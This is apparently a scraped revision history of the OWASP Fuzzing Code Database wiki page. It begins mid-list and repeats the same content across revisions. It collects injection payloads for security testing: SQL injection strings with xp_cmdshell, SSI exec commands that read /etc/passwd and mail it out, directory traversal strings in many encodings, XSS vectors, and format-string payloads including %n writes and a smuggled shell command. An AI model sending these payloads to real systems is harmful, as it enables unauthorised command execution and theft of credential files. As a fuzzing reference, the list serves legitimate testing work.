<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> <br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20478
Category:OWASP Fuzzing Code Database
2007-07-30T13:57:19Z
<p>Foobar23: </p>
<hr />
<div>This database is a collection of several statements used in code injection software. All to often security professionals use their own repositories of statements collected from several projects for a long time. We want to collect all these statements - compose them - merging the database of several projects like [[WebScarab]] and [[JBroFuzz]] gaining a big dataset of effective statements to provide better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
</pre><br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
</pre><br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
<a href="javas&#99;ript&#35;[code]"><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> <br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20476
Category:OWASP Fuzzing Code Database
2007-07-30T13:53:01Z
<p>Foobar23: Added Format Strings</p>
<hr />
<div>This database is a collection of several statements used in code injection software. All to often security professionals use their own repositories of statements collected from several projects for a long time. We want to collect all these statements - compose them - merging the database of several projects like [[WebScarab]] and [[JBroFuzz]] gaining a big dataset of effective statements to provide better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
a" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
<br />
</pre><br />
<br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
<br />
</pre><br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
<br />
<a href="javas&#99;ript&#35;[code]"><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> <br />
<br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
